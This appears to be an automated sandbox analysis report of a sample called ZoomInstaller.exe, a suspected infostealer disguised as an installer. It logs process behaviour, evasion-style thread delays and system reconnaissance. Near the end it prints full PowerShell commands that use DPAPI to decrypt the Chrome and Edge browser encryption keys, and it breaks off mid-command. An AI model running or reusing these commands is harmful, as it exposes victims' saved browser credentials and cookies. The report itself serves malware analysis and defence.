    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

    Malware Analysis System Evasion

    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3528
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1768
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3611
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 940
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3534
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1336
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3030
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1415
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7824 Thread sleep time: -2767011611056431s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7796 Thread sleep time: -2767011611056431s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7912 Thread sleep count: 3611 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7912 Thread sleep count: 940 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7944 Thread sleep time: -1844674407370954s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7928 Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8168 Thread sleep time: -2767011611056431s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8152 Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7176 Thread sleep time: -2767011611056431s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6016 Thread sleep time: -922337203685477s >= -30000s
    Source: ZoomInstaller.exe, 00000000.00000002.1983594822.00000297456FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: C:\Windows\System32\wbem\WMIC.exeProcess information queried: ProcessInformation
    Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
    Source: C:\Users\user\Desktop\ZoomInstaller.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_videocontroller get caption
    Source: C:\Users\user\Desktop\ZoomInstaller.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
    Source: C:\Users\user\Desktop\ZoomInstaller.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
    Source: C:\Users\user\Desktop\ZoomInstaller.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get Version
    Source: C:\Users\user\Desktop\ZoomInstaller.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(Get-Item 'C:\Program Files\Google\Chrome\Application\chrome.exe').VersionInfo.FileVersion"
    Source: C:\Users\user\Desktop\ZoomInstaller.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(Get-Item 'C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe').VersionInfo.FileVersion"
    Source: C:\Users\user\Desktop\ZoomInstaller.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command " Add-Type -AssemblyName \"System.Security\"; $decryptedKey = [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,112,27,63,29,45,147,76,154,28,167,163,109,166,140,139,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,162,223,64,66,67,235,252,176,134,0,234,34,88,190,96,79,120,163,57,223,70,184,59,55,251,103,80,66,213,41,79,203,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,65,3,137,251,132,67,165,117,37,32,77,156,77,25,114,22,240,181,235,103,91,102,117,255,144,36,92,249,151,253,60,75,48,0,0,0,43,225,223,217,151,30,78,184,8,140,233,239,111,191,100,251,188,228,105,81,245,79,114,215,91,96,112,252,70,126,43,40,253,217,123,23,241,100,8,207,153,67,107,184,161,113,210,62,64,0,0,0,16,48,146,16,208,228,76,223,250,118,61,199,169,142,18,65,154,30,229,124,35,149,206,81,42,123,202,212,101,122,75,162,189,113,249,192,143,80,146,46,12,170,101,4,63,156,140,201,97,222,242,144,253,193,232,162,242,114,34,110,102,135,201,250), $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser); $decryptedKeyString = [System.BitConverter]::ToString($decryptedKey) -replace '-', ''; Write-Output $decryptedKeyString"
    Source: C:\Users\user\Desktop\ZoomInstaller.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command " Add-Type -AssemblyName \"System.Security\"; $decryptedKey = [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,112,27,63,29,45,147,76,154,28,167,163,109,166,140,139,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,177,111,46,150,212,157,15,4,228,252,12,0,1,183,251,108,66,54,253,189,23,124,86,207,222,56,201,250,182,152,221,247,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,178,13,225,93,214,215,151,162,72,143,194,133,190,22,214,149,170,149,74,147,55,106,15,180,131,73,196,197,128,118,103,89,48,0,0,0,94,206,242,8,29,35,27,71,101,58,135,55,188,69,108,246,46,232,119,93,65,217,99,7,252,165,33,164,119,40,187,209,190,181,221,12,22,110,211,109,137,129,98,159,150,234,140,244,64,0,0,0,160,185,210,147,25,143,46,73,184,87,79,38,71,228,189,220,249,51,245,132,106,162,213,227,45,47,24,171,45,48,70,50,96,105,2,105,84,9,7,23,200,91,89,93,224,1,154,41,99,254,68,168,144,46,197,126,233,182,158,66,11,216,163,157), $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser); $decryptedKeyString = [System.BitConverter]::ToString($decryptedKey) -replace '-', ''; Write-Output $decryptedKeyString"
    Source: C:\Users\user\Desktop\ZoomInstaller.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command " add-type -assemblyname \"system.security\"; $decryptedkey = 